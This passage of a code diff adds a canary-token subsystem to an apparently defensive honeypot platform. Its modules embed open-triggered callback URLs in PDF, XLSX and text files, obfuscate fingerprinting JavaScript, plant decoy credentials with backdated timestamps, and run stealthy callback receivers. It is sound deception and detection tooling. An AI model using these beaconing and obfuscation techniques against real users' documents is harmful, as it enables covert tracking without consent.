 """PDF instrumenter — requires :mod:`pikepdf` (optional dependency).
 PDF embedding is non-trivial: the cleanest place to put a callback
 is an ``/AA`` (additional actions) ``/O`` (open) entry on the
 catalog or a ``/URI`` action on a link annotation.  Either path
 needs proper xref-table updates — pikepdf handles that for us.
 If pikepdf isn't available in the environment the instrumenter
 raises :class:`InstrumenterRejectedError` so the API can return a
 clear 400 directing the operator to either install pikepdf or
 re-upload as ``passthrough``.
 We don't ship a stdlib fallback because every "naive" PDF mutation
 I'm aware of (appending raw bytes, splicing into the trailer, etc.)
 breaks the document's xref table and trips a "file is corrupt"
 warning in modern viewers — which the attacker will absolutely
 notice.
 """
 from __future__ import annotations
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryInstrumenter,
    InstrumenterRejectedError,
 )
 class PdfInstrumenter(CanaryInstrumenter):
    name = "pdf"
    mime_prefixes = ("application/pdf",)
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        try:
            import pikepdf
        except ImportError as e:
            raise InstrumenterRejectedError(
                "PDF instrumenter requires pikepdf; install it (`pip "
                "install pikepdf`) or re-upload the artifact with "
                "kind=passthrough so it ships unmodified."
            ) from e
        url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        try:
            import io
            buf = io.BytesIO(blob)
            with pikepdf.open(buf) as pdf:
                # Add an OpenAction that fires a URI action on document
                # open. Most viewers prompt before fetching; that's
                # fine — even the prompt itself can trip a "user
                # interacted with the document" tell, and an
                # auto-allow viewer fetches the URL silently.
                action = pikepdf.Dictionary(
                    Type=pikepdf.Name("/Action"),
                    S=pikepdf.Name("/URI"),
                    URI=pikepdf.String(url),
                )
                pdf.Root[pikepdf.Name("/OpenAction")] = action
                out = io.BytesIO()
                pdf.save(out)
                mutated = out.getvalue()
        except Exception as e:
            raise InstrumenterRejectedError(
                f"failed to instrument PDF: {e!s}"
            ) from e
        return CanaryArtifact(
            path=target_path,
            content=mutated,
            mode=0o644,
            mtime_offset=-86400 * 14,
            instrumenter=self.name,
            notes=[f"installed /OpenAction /URI -> {url}"],
        )
--- a/decnet/canary/instrumenters/plain.py
+++ b/decnet/canary/instrumenters/plain.py
@@ -0,0 +1,80 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Plain-text / config-file instrumenter.
 Two embedding strategies, picked in order:
 1. **Token substitution.**  If the blob contains the literal
   placeholder ``{{CANARY_URL}}`` or ``{{CANARY_HOST}}``, replace it.
   This gives operators full control over where the slug lands —
   they can pre-edit the file with placeholders before uploading.
 2. **Append.**  Otherwise, append a comment line that mentions the
   callback URL.  The comment style adapts to the file's apparent
   syntax (``#`` for shell/yaml/python/dockerfile, ``//`` for json5/
   javascript-ish, ``;`` for ini).
 Operators who want neither behavior should upload the file as
 ``passthrough``.
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
 _SLASH_HINTS = (b"//", b"function ", b"const ", b"let ", b"var ")
 _SEMI_HINTS = (b"[default]", b"[section]", b"\n[")
 def _comment_prefix(blob: bytes) -> bytes:
    head = blob[:512]
    if any(h in head for h in _SEMI_HINTS):
        return b"; "
    if any(h in head for h in _SLASH_HINTS):
        return b"// "
    # Default to # — the most common comment glyph across config files
    # we'd plausibly canary.
    return b"# "
 class PlainInstrumenter(CanaryInstrumenter):
    name = "plain"
    mime_prefixes = ("text/", "application/json", "application/yaml", "application/toml")
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        base = ctx.http_base.rstrip("/")
        callback_url = f"{base}/c/{ctx.callback_token}".encode()
        callback_host = (
            f"{ctx.callback_token}.{ctx.dns_zone}".encode()
            if ctx.dns_zone else b""
        )
        notes: list[str] = []
        out = blob
        if b"{{CANARY_URL}}" in blob:
            out = out.replace(b"{{CANARY_URL}}", callback_url)
            notes.append(f"substituted {{{{CANARY_URL}}}} -> {callback_url.decode()}")
        if b"{{CANARY_HOST}}" in blob and callback_host:
            out = out.replace(b"{{CANARY_HOST}}", callback_host)
            notes.append(f"substituted {{{{CANARY_HOST}}}} -> {callback_host.decode()}")
        if not notes:
            # No placeholders — append a comment line at the end.
            prefix = _comment_prefix(blob)
            tail = (
                b"\n" + prefix + b"see " + callback_url
                + b" for the latest version\n"
            )
            out = (out if out.endswith(b"\n") else out + b"\n") + tail
            notes.append(
                f"appended comment line carrying {callback_url.decode()}"
            )
        return CanaryArtifact(
            path=target_path,
            content=out,
            mode=0o644,
            mtime_offset=-86400 * 7,
            instrumenter=self.name,
            notes=notes,
        )
--- a/decnet/canary/instrumenters/xlsx.py
+++ b/decnet/canary/instrumenters/xlsx.py
@@ -0,0 +1,96 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """XLSX instrumenter — embed an external-image link.
 XLSX is structurally identical to DOCX (Office Open XML zip).  The
 injection target is the workbook's relationships file
 (``xl/_rels/workbook.xml.rels``).  We add an external image
 relationship there; Excel/LibreOffice fetch external images on
 workbook open in the same way Word does.
 We don't inject a ``<drawing>`` element into a sheet because that
 requires touching ``xl/worksheets/sheetN.xml`` *and* allocating a new
 ``xl/drawings/drawingN.xml`` part — much higher chance of mangling
 the file.  An orphan external image relationship is enough: many
 Office viewers fetch all relationships at open time regardless of
 whether they're referenced from a sheet.
 If the operator wants a stronger trigger (image visible in the
 sheet, fetched even by viewers that lazy-load external resources)
 they should embed the slug as a hyperlink cell content via the
 ``plain``/``passthrough`` instrumenters.
 """
 from __future__ import annotations
 import io
 import zipfile
 from typing import Tuple
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryInstrumenter,
    InstrumenterRejectedError,
 )
 from decnet.canary.instrumenters.docx import _inject_relationship, _next_rid
 _RELS_PATHS = (
    "xl/_rels/workbook.xml.rels",
    "xl/_rels/sharedStrings.xml.rels",
 )
 def _mutate(blob: bytes, url: str) -> Tuple[bytes, str, str]:
    try:
        with zipfile.ZipFile(io.BytesIO(blob), "r") as zf:
            members = [(zi, zf.read(zi.filename)) for zi in zf.infolist()]
    except zipfile.BadZipFile as e:
        raise InstrumenterRejectedError("uploaded blob is not a valid XLSX zip") from e
    target_rels: str | None = None
    for zi, _ in members:
        if zi.filename in _RELS_PATHS:
            target_rels = zi.filename
            break
    if not target_rels:
        raise InstrumenterRejectedError(
            "XLSX has no workbook relationships file to mutate"
        )
    out_members = []
    rid = ""
    for zi, data in members:
        if zi.filename == target_rels:
            rid = _next_rid(data)
            data = _inject_relationship(data, rid, url)
        out_members.append((zi, data))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf_out:
        for zi, data in out_members:
            zf_out.writestr(zi, data)
    return out.getvalue(), rid, target_rels
 class XlsxInstrumenter(CanaryInstrumenter):
    name = "xlsx"
    mime_prefixes = (
        "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
    )
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        mutated, rid, target_rels = _mutate(blob, url)
        return CanaryArtifact(
            path=target_path,
            content=mutated,
            mode=0o644,
            mtime_offset=-86400 * 14,
            instrumenter=self.name,
            notes=[
                f"injected external-image relationship {rid} into "
                f"{target_rels} -> {url}",
            ],
        )
--- a/decnet/canary/obfuscator.py
+++ b/decnet/canary/obfuscator.py
@@ -0,0 +1,178 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Per-mint JS obfuscator wrapper.
 Thin Python wrapper around the ``javascript-obfuscator`` Node package.
 Used by the fingerprint generators / instrumenters to produce a unique,
 hard-to-statically-analyse JS blob per canary mint.
 Two design choices flow from the canary contract in :mod:`base`:
 * **Determinism.** Generators must return byte-identical artifacts for
  the same ``(callback_token, http_base, dns_zone, persona)``.  We
  derive a numeric seed from the callback token and pass it to the
  obfuscator's own ``seed`` option, and we derive the polymorphic
  config bits from the same hash so a re-mint reproduces exactly.
 * **Per-mint uniqueness.** Two different callback tokens produce
  structurally different output: different identifier names, different
  string-array rotation, optionally different transforms enabled.
 The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
 We pass code+options as JSON on stdin and read the obfuscated result
 from stdout.  Stderr surfaces obfuscator failures.
 """
 from __future__ import annotations
 import hashlib
 import hmac
 import json
 import os
 import subprocess  # nosec B404 — Node helper exec is the whole point
 from pathlib import Path
 from typing import Any
 _HELPER = Path(__file__).parent / "_obfuscate_helper.js"
 _PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
 # Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
 # specific runtime; default to PATH lookup.
 _NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
 # Hard timeout for the obfuscator subprocess. Real runs on the
 # fingerprint payload sit well under 5s on a dev box.
 _TIMEOUT_S = 30
 class ObfuscatorError(RuntimeError):
    """Raised when the Node helper fails or returns empty output."""
 class FingerprintSecretMissing(RuntimeError):
    """Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
    Fingerprint canaries embed a per-mint nonce derived from this
    server-side secret; without it the worker cannot validate incoming
    fingerprint beacons, so we fail loud at mint time rather than ship
    a defeatable canary.
    """
 _FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET"  # nosec B105 — this is an env var name, not a hardcoded password
 def nonce_for(callback_token: str, mint_uuid: str) -> str:
    """Compute the per-mint fingerprint nonce.
    HMAC-SHA256 keyed on the server-side master secret, message is
    ``callback_token + "|" + mint_uuid``.  Truncated to 16 hex chars
    (~64 bits of entropy) — enough to defeat slug-only forgery while
    fitting comfortably into a query string.
    """
    secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
    if not secret:
        raise FingerprintSecretMissing(
            f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
        )
    msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
    return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
 def _seed_from_token(callback_token: str) -> int:
    """Derive a 31-bit numeric seed from the callback token.
    ``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
    using a SHA-256-derived prefix gives us a uniform distribution
    across the 31-bit positive range.
    """
    h = hashlib.sha256(callback_token.encode("utf-8")).digest()
    return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
 def _config_from_seed(seed: int) -> dict[str, Any]:
    """Build a deterministic, per-mint obfuscator config.
    The hash bits drive *which* transforms apply — two mints get
    structurally different outputs, not just different identifier names.
    Defaults stay aggressive enough that reverse engineering is real
    work; we never disable string-array or rename, only vary the dial.
    """
    bits = seed
    encodings = ("base64", "rc4")
    string_array_encoding = [encodings[bits & 1]]
    control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0  # 0.5 .. ~1.0
    dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0  # 0.2 .. ~0.7
    transform_object_keys = bool((bits >> 17) & 1)
    numbers_to_expressions = bool((bits >> 18) & 1)
    simplify = bool((bits >> 19) & 1)
    return {
        "compact": True,
        "seed": seed,
        "controlFlowFlattening": True,
        "controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
        "deadCodeInjection": True,
        "deadCodeInjectionThreshold": round(dead_code_threshold, 3),
        "stringArray": True,
        "stringArrayEncoding": string_array_encoding,
        "stringArrayThreshold": 1,
        "stringArrayRotate": True,
        "stringArrayShuffle": True,
        "splitStrings": True,
        "splitStringsChunkLength": 4 + (bits & 7),
        "transformObjectKeys": transform_object_keys,
        "numbersToExpressions": numbers_to_expressions,
        "simplify": simplify,
        "selfDefending": False,  # breaks SVG embed; not worth the cost
        "renameGlobals": False,
        "identifierNamesGenerator": "mangled-shuffled",
    }
 def obfuscate(code: str, *, callback_token: str) -> str:
    """Obfuscate *code* deterministically per *callback_token*.
    Raises :class:`ObfuscatorError` if Node fails or returns empty.
    """
    seed = _seed_from_token(callback_token)
    options = _config_from_seed(seed)
    payload = json.dumps({"code": code, "options": options})
    try:
        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
            [_NODE_BIN, str(_HELPER)],
            input=payload, capture_output=True, text=True,
            timeout=_TIMEOUT_S, check=False,
        )
    except FileNotFoundError as e:
        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
    except subprocess.TimeoutExpired as e:
        raise ObfuscatorError("javascript-obfuscator timed out") from e
    if proc.returncode != 0:
        raise ObfuscatorError(
            f"javascript-obfuscator failed rc={proc.returncode} "
            f"stderr={proc.stderr.strip()[:400]}"
        )
    out = proc.stdout
    if not out.strip():
        raise ObfuscatorError("javascript-obfuscator returned empty output")
    return out
 def render_fingerprint_js(
    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
 ) -> str:
    """Build the obfuscated fingerprint JS for a single mint.
    Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
    ``{{MINT_NONCE}}`` in the payload template, then runs it through
    :func:`obfuscate` with a seed derived from the callback token.
    The nonce is appended as ``&k=`` on every beacon URL the JS emits;
    the worker rejects fingerprint payloads whose ``?k=`` doesn't match
    the row's :attr:`CanaryToken.fingerprint_nonce`.
    """
    template = _PAYLOAD.read_text(encoding="utf-8")
    beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
    src = (
        template
        .replace("{{BEACON_URL}}", beacon)
        .replace("{{MINT_UUID}}", mint_uuid)
        .replace("{{MINT_NONCE}}", nonce)
    )
    return obfuscate(src, callback_token=callback_token)
--- a/decnet/canary/package.json
+++ b/decnet/canary/package.json
@@ -0,0 +1,10 @@
 {
  "name": "decnet-canary-obfuscator",
  "version": "0.1.0",
  "private": true,
  "description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
  "main": "_obfuscate_helper.js",
  "dependencies": {
    "javascript-obfuscator": "^5.4.2"
  }
 }
--- a/decnet/canary/paths.py
+++ b/decnet/canary/paths.py
@@ -0,0 +1,87 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Persona-aware path resolution for canary artifacts.
 Linux-persona deckies use POSIX-shaped paths under ``/home/<user>``.
 "Windows" personas (still Linux containers under the hood — see
 :mod:`decnet.archetypes`) use Windows-shaped paths under
 ``/home/<user>/AppData/...`` so an attacker browsing the filesystem
 through a planted RDP/SMB session sees the right shape.
 The persona lookup is best-effort: callers pass the
 :attr:`decnet.archetypes.Archetype.nmap_os` value (``"linux"`` or
 ``"windows"``); unknown personas fall through to ``"linux"``.
 Operators can always override by passing an explicit
 ``placement_path`` when creating a token.
 """
 from __future__ import annotations
 DEFAULT_LINUX_USER = "admin"
 DEFAULT_WINDOWS_USER = "Administrator"
 # Canonical placements for the synthesizer-driven baseline tokens.
 # Operators can override per-token via the API, but these are the
 # defaults the deploy-time seed uses.
 _LINUX_DEFAULTS: dict[str, str] = {
    "git_config": "/home/{user}/.git/config",
    "env_file": "/home/{user}/.env",
    "ssh_key": "/home/{user}/.ssh/id_rsa",
    "aws_creds": "/home/{user}/.aws/credentials",
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }
 _WINDOWS_DEFAULTS: dict[str, str] = {
    "git_config": "/home/{user}/AppData/Local/Programs/Git/etc/gitconfig",
    "env_file": "/home/{user}/Desktop/prod.env",
    "ssh_key": "/home/{user}/.ssh/id_rsa",  # OpenSSH on Windows uses the same path
    "aws_creds": "/home/{user}/.aws/credentials",
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }
 def default_user(persona: str) -> str:
    """Return the conventional unprivileged username for a persona."""
    return DEFAULT_WINDOWS_USER if persona == "windows" else DEFAULT_LINUX_USER
 def default_path_for(generator: str, persona: str = "linux") -> str:
    """Resolve the default placement path for a synthesized token.
    Returns an absolute container path with ``{user}`` already
    expanded.  Falls back to a sane Linux default for unknown
    personas — better to plant *something* than fail the deploy hook.
    """
    table = _WINDOWS_DEFAULTS if persona == "windows" else _LINUX_DEFAULTS
    template = table.get(generator)
    if not template:
        # Unknown generator — fall back to a generic /tmp drop so the
        # planter still has somewhere to write.  The API rejects
        # unknown generators upstream, so this branch is defensive.
        return f"/tmp/{generator}.canary"  # nosec B108 — placement inside attacker-facing decoy container, not host /tmp
    return template.format(user=default_user(persona))
 def normalize_placement(path: str) -> str:
    """Validate and normalize an operator-supplied placement path.
    Forbids relative paths, NUL bytes, and shell metacharacters that
    ``docker exec sh -c`` can't safely round-trip.  Returns the
    sanitised path unchanged when valid; raises :class:`ValueError`
    otherwise so the API can return a 400 with a clear message.
    """
    if not path or not path.startswith("/"):
        raise ValueError("placement_path must be absolute (start with '/')")
    if "\x00" in path:
        raise ValueError("placement_path may not contain NUL")
    if "\n" in path or "\r" in path:
        raise ValueError("placement_path may not contain newlines")
    if "../" in path or path.endswith("/.."):
        raise ValueError("placement_path may not contain '..' segments")
    return path
--- a/decnet/canary/planter.py
+++ b/decnet/canary/planter.py
@@ -0,0 +1,307 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Plant / revoke canary artifacts inside running decky containers.
 Single entry point per operation:
 * :func:`plant` writes a :class:`CanaryArtifact` into one decky's
  filesystem via ``docker exec`` (mirroring the SSH driver's
  ``_run_file`` pattern), backdates the mtime, sets the requested
  mode, and publishes ``canary.{token_id}.placed`` on the bus.
 * :func:`revoke` unlinks the file (best-effort) and publishes
  ``canary.{token_id}.revoked``.
 * :func:`seed_baseline` is the deploy-hook helper: synthesises the
  configured baseline set for one decky, persists rows, plants each.
  Failures are logged but do **not** abort the deploy (the deployer
  hook calls this best-effort).
 We don't reuse :class:`SSHDriver` directly because the orchestrator
 driver is tied to its action types (``FileAction`` carries str
 content; canary content is bytes).  The planter takes the same
 shape but speaks bytes-via-base64 over the wire.
 """
 from __future__ import annotations
 import os
 from datetime import datetime, timedelta, timezone
 from secrets import token_urlsafe
 from typing import Any, Iterable, Optional
 from decnet.bus import topics
 from decnet.bus.base import BaseBus
 from decnet.bus.factory import get_bus
 from decnet.canary.base import CanaryArtifact, CanaryContext
 from decnet.canary.factory import get_generator
 from decnet.canary.paths import default_path_for
 from decnet.decky_io import (
    delete_file_from_container,
    resolve_topology_container,
    write_file_to_container,
 )
 from decnet.logging import get_logger
 from decnet.web.db.repository import BaseRepository
 log = get_logger("canary.planter")
 # Container suffix — matches the orchestrator SSH driver's convention
 # (``<decky_name>-ssh``).  Canary placement always happens through the
 # ssh container because every decky has one and it carries the most
 # realistic filesystem layout.
 _SSH_CONTAINER_SUFFIX = "-ssh"
 def _container_for(decky_name: str) -> str:
    return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
 # resolve_topology_container is re-exported from decky_io for back-compat
 # with callers (tests, deploy hook) that imported it from this module
 # before the decky_io extraction.
 __all__ = [
    "plant",
    "revoke",
    "resolve_topology_container",
    "seed_baseline",
    "seed_baseline_topology",
 ]
 async def _publish(
    bus: Optional[BaseBus], topic: str, payload: dict[str, Any],
 ) -> None:
    """Best-effort publish — never raises.
    When ``bus`` is None we resolve via :func:`get_bus`; either way
    bus-side failures are logged and swallowed (delivery is at-most-once
    by contract; the DB row is source of truth).
    """
    try:
        owns_bus = bus is None
        target = bus if bus is not None else get_bus()
        if owns_bus:
            await target.connect()
        await target.publish(topic, payload)
        if owns_bus:
            await target.close()
    except Exception as e:  # noqa: BLE001
        log.warning("canary bus publish failed topic=%s err=%s", topic, e)
 async def plant(
    decky_name: str,
    artifact: CanaryArtifact,
    *,
    token_uuid: str,
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Write *artifact* into the decky's ssh container.
    Returns ``(success, error_or_none)``.  When ``repo`` is provided
    the token row's state is updated to ``planted`` / ``failed``
    accordingly.  When ``publish`` is True a ``canary.<id>.placed``
    event is published on the bus on success.
    The function never raises on docker errors — callers (the API,
    the deploy hook) treat the result as data.
    """
    if not artifact.path:
        err = "planter requires a non-empty artifact.path"
        log.warning("canary.plant skipped: %s decky=%s token=%s", err, decky_name, token_uuid)
        if repo is not None:
            await repo.update_canary_token_state(token_uuid, "failed", err)
        return False, err
    target_container = container or _container_for(decky_name)
    mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
    success, error = await write_file_to_container(
        target_container, artifact.path, artifact.content,
        mode=artifact.mode, mtime=mtime,
    )
    if repo is not None:
        if success:
            await repo.update_canary_token_state(token_uuid, "planted", None)
        else:
            await repo.update_canary_token_state(token_uuid, "failed", error)
    if success and publish:
        await _publish(bus, topics.canary(token_uuid, topics.CANARY_PLACED), {
            "token_id": token_uuid,
            "decky_name": decky_name,
            "placement_path": artifact.path,
            "instrumenter": artifact.instrumenter,
            "generator": artifact.generator,
        })
    if not success:
        log.warning(
            "canary.plant failed decky=%s token=%s container=%s err=%r",
            decky_name, token_uuid, target_container, error,
        )
    return success, error
 async def revoke(
    decky_name: str,
    placement_path: str,
    *,
    token_uuid: str,
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Best-effort unlink + state transition + bus publish.
    Returns ``(success, error_or_none)``.  ``success`` is True when
    the file is gone after the call (whether we deleted it or it was
    already missing); only docker / container-down errors return False.
    """
    target_container = container or _container_for(decky_name)
    success, error = await delete_file_from_container(
        target_container, placement_path,
    )
    if repo is not None:
        await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
    if publish:
        await _publish(bus, topics.canary(token_uuid, topics.CANARY_REVOKED), {
            "token_id": token_uuid,
            "decky_name": decky_name,
            "placement_path": placement_path,
        })
    return success, error
 def _baseline_set() -> Iterable[str]:
    """Return the configured baseline generator names.
    Honors ``DECNET_CANARY_BASELINE`` (comma-separated).  Default is
    a sensible mix that exercises every callback-bearing generator
    plus a passive aws_creds drop for realism.
    """
    raw = os.environ.get(
        "DECNET_CANARY_BASELINE",
        "git_config,env_file,honeydoc,aws_creds",
    )
    return [n.strip() for n in raw.split(",") if n.strip()]
 def _ctx_for(slug: str) -> CanaryContext:
    """Build a :class:`CanaryContext` from the canary worker config."""
    base = os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088")
    zone = os.environ.get("DECNET_CANARY_DNS_ZONE", "")
    return CanaryContext(callback_token=slug, http_base=base, dns_zone=zone)
 async def seed_baseline(
    decky_name: str,
    repo: BaseRepository,
    *,
    persona: str = "linux",
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
    container: Optional[str] = None,
 ) -> list[dict[str, Any]]:
    """Plant the configured baseline canary set on one decky.
    Best-effort: any individual placement that fails is logged and
    the row is left in ``state=failed``; the deployer hook treats the
    return value as informational, not authoritative.
    Returns the list of token rows created (whether their planting
    ultimately succeeded or not), so the caller can surface them in
    the deploy report.
    """
    out: list[dict[str, Any]] = []
    for gen_name in _baseline_set():
        try:
            generator = get_generator(gen_name)
        except ValueError:
            log.warning("canary.seed_baseline: unknown generator %r — skipping", gen_name)
            continue
        slug = token_urlsafe(16)
        ctx = _ctx_for(slug)
        artifact = generator.generate(ctx)
        artifact.path = default_path_for(gen_name, persona)
        kind = "aws_passive" if gen_name == "aws_creds" else "http"
        # Persist first so the planter has a row to update; that way a
        # crash mid-plant leaves a recoverable failed-state row.
        from uuid import uuid4
        token_uuid = str(uuid4())
        await repo.create_canary_token({
            "uuid": token_uuid,
            "kind": kind,
            "decky_name": decky_name,
            "blob_uuid": None,
            "instrumenter": None,
            "generator": gen_name,
            "placement_path": artifact.path,
            "callback_token": slug,
            "secret_seed": slug,
            "created_by": created_by,
            "state": "planted",  # optimistic — plant() flips to failed on error
        })
        await plant(
            decky_name, artifact,
            token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
            container=container,
        )
        out.append({
            "token_uuid": token_uuid, "generator": gen_name, "kind": kind,
            "callback_token": slug, "placement_path": artifact.path,
        })
    return out
 async def seed_baseline_topology(
    repo: BaseRepository,
    topology_id: str,
    *,
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
 ) -> list[dict[str, Any]]:
    """Plant baseline canaries on every decky in a MazeNET topology.
    Mirrors :func:`seed_baseline` for the topology path. Container name
    resolution uses :func:`resolve_topology_container` since topology
    deckies may not have an ssh service — in that case we target the
    base container instead.
    Best-effort: failures on any single decky are logged inside
    :func:`plant`; the deploy hook treats the return value as
    informational. Returns a flat list of per-token dicts (with an added
    ``decky_name`` key) across all deckies.
    """
    from decnet.topology.persistence import hydrate
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        log.warning(
            "canary.seed_baseline_topology: topology %s not found", topology_id,
        )
        return []
    out: list[dict[str, Any]] = []
    for decky in hydrated["deckies"]:
        cfg = decky.get("decky_config") or {}
        decky_name = cfg.get("name") or decky.get("name")
        if not decky_name:
            continue
        services = decky.get("services") or []
        container = resolve_topology_container(topology_id, decky_name, services)
        # MazeNET deckies don't carry an OS persona today; default to
        # linux (every base image we ship is Linux).
        rows = await seed_baseline(
            decky_name, repo,
            persona="linux", created_by=created_by, bus=bus,
            container=container,
        )
        for r in rows:
            r["decky_name"] = decky_name
            out.append(r)
    return out
--- a/decnet/canary/storage.py
+++ b/decnet/canary/storage.py
@@ -0,0 +1,90 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Filesystem store for operator-uploaded canary blobs.
 Blobs live under ``/var/lib/decnet/canary/blobs/<sha256>`` (override
 via ``DECNET_CANARY_BLOB_DIR``) and are deduplicated by content hash.
 The DB table :class:`decnet.web.db.models.CanaryBlob` mirrors
 metadata; the bytes are read on demand at instrumentation time, so
 the API process never holds large operator uploads in memory longer
 than the request itself.
 Refcount-aware deletion is enforced at the DB layer (see
 :meth:`decnet.web.db.repository.BaseRepository.delete_canary_blob`);
 this module only provides write/read/unlink primitives keyed by
 sha256.
 """
 from __future__ import annotations
 import hashlib
 import os
 from pathlib import Path
 from typing import Tuple
 def blob_dir() -> Path:
    """Return the on-disk root for canary blobs.
    Honors ``DECNET_CANARY_BLOB_DIR`` so tests can point at a tmp
    path.  The directory is created lazily on first write.
    """
    raw = os.environ.get("DECNET_CANARY_BLOB_DIR", "/var/lib/decnet/canary/blobs")
    return Path(raw)
 def _path_for(sha256: str) -> Path:
    # Two-level fan-out (``ab/cd/abcd...``) keeps any one directory
    # from accumulating thousands of entries on busy fleets.  Same
    # shape as Git's loose-object store.
    if len(sha256) < 4:
        raise ValueError("sha256 must be at least 4 chars")
    root = blob_dir()
    return root / sha256[:2] / sha256[2:4] / sha256
 def write_blob(content: bytes) -> Tuple[str, Path, int]:
    """Persist ``content`` under its sha256 path.
    Idempotent: if the target file already exists with the same
    bytes, no rewrite happens.  Returns ``(sha256, path,
    size_bytes)``.
    """
    sha = hashlib.sha256(content).hexdigest()
    target = _path_for(sha)
    target.parent.mkdir(parents=True, exist_ok=True)
    if not target.exists():
        # Atomic-ish: write to a temp sibling and rename.  Avoids the
        # half-written-file race a concurrent reader would otherwise
        # see if we wrote in place.
        tmp = target.with_suffix(target.suffix + ".part")
        tmp.write_bytes(content)
        os.replace(tmp, target)
    return sha, target, len(content)
 def read_blob(sha256: str) -> bytes:
    """Read the bytes for a stored blob.
    Raises :class:`FileNotFoundError` when the on-disk row was unlinked
    out of band (operator pruned ``/var/lib/decnet`` by hand) — the
    caller (instrumenter dispatch) surfaces it as a 410-ish error so
    the operator can re-upload.
    """
    return _path_for(sha256).read_bytes()
 def unlink_blob(sha256: str) -> bool:
    """Delete the on-disk bytes for ``sha256``.
    Returns True if a file was removed, False if it was already gone.
    The DB row deletion happens in
    :meth:`SQLModelRepository.delete_canary_blob`; this function is
    a best-effort companion called *after* the DB delete commits so
    a crash between them leaves a recoverable orphan, never a
    dangling DB reference.
    """
    target = _path_for(sha256)
    try:
        target.unlink()
    except FileNotFoundError:
        return False
    return True
--- a/decnet/canary/worker.py
+++ b/decnet/canary/worker.py
@@ -0,0 +1,421 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """``decnet canary`` worker — HTTP + DNS callback receivers.
 Two surfaces, one process:
 * **HTTP** — a tiny FastAPI app on its own port (default 8088).  The
  only useful route is ``GET /c/{slug}`` which looks up the slug in
  the canary token table, persists a :class:`CanaryTrigger` row,
  publishes ``canary.<token_id>.triggered`` on the bus, and returns
  a 1×1 transparent GIF (or 204 if the client's ``Accept`` doesn't
  list any image type).
 * **DNS** — an authoritative UDP server (default 5353 if non-root,
  53 if root) for ``*.<canary_zone>``.  Same lookup + persist +
  publish flow, plus a sinkhole A record so the attacker's resolver
  doesn't loop on NXDOMAIN.
 Both surfaces are **stealth** by policy
 (:mod:`feedback_stealth`): no DECNET strings in headers / banners /
 error pages.  The HTTP app strips the default ``Server: uvicorn``
 header in middleware; FastAPI's docs/openapi UI is disabled because
 discovering them would tip off the attacker that this is a honeypot.
 The worker is supervised by its own systemd unit
 (``decnet-canary.service``); like every other DECNET worker, it
 crashes loudly rather than masking failures.
 """
 from __future__ import annotations
 import asyncio
 import base64
 import binascii
 import json
 import os
 import time
 import uuid
 from datetime import datetime, timezone
 from typing import Any, Optional
